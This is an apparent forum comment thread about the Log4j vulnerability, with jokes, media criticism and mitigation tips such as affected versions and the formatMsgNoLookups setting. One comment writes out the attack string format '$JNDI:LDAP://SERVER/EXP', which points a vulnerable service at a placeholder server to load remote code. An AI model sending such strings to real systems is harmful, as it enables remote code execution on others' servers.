This looks nasty! Watch your servers.
Or donât connect your server to the outside worldâŚ
I am puzzled. A whole page of words yet there is no information given (journalism at itâs finest).
So far Iâve got âdo not have minecraft server on your production server (unles you patch it)â.
If I had to run windows at home, Malwarebytes would be the only program I would run
lol.
Java on a Server? Serious? Never!
every service that uses log4j can be attacked. It does not have to be internet-facing, because the attack can be carried to internal systems via payload.
log4j versions 2.0-beta9 to 2.14.1 are vulnerable, although log4j 2.10 or higher can be âhardenedâ against the attack with setting log4j2.formatMsgNoLookups
to true
or by removing the JndiLookup
class. Log4j 2.15 is the first fixed version.
Several hosters already said that they see internetwide scans for vulnerable services, most likely by attackers scanning for possible targets.
Here is an attempt by someone to list vulnerable services: https://github.com/YfryTchsGD/Log4jAttackSurface
Basically, everyone seems to be vulnerable.
Edit: Apparently, hackers only need to send a string in the format $JNDI:LDAP://SERVER/EXP
to a vulnerable service to launch the attack.
LOL at the global mass scanning this has triggered.
So many l33t hax0rs / bad actors / nation states putting together lists of vulnerable services / organizations for potential future exploitation.
You can bet randsomeware is being tweaked to use this CVE as a delivery mechanism too.
Only specific versions of log4j are vulnerable, small silver lining, but good luck opsec people trying to untangle this mess.
Itâs the Guardian, what do you expect? Useful information? Truth? Integrity? Any standards at all?
Itâs not even journalism, itâs just tittle-tattle.
Update on the BBC.
The âflagshipâ payment system used by my countryâs government offices, to make huge payments daily runs using Java Applets and hence needs Internet Explorer to run. There have been news about high school drop outs hacking the thing, but rewriting the application seems more expensive to the government than spending to catch these kids and dealing with losses there.
Technology is really amazing, isnât it
Well, rest assured, our purple little universe is far, far away from this issue. No Java on our server, only in my coffee mug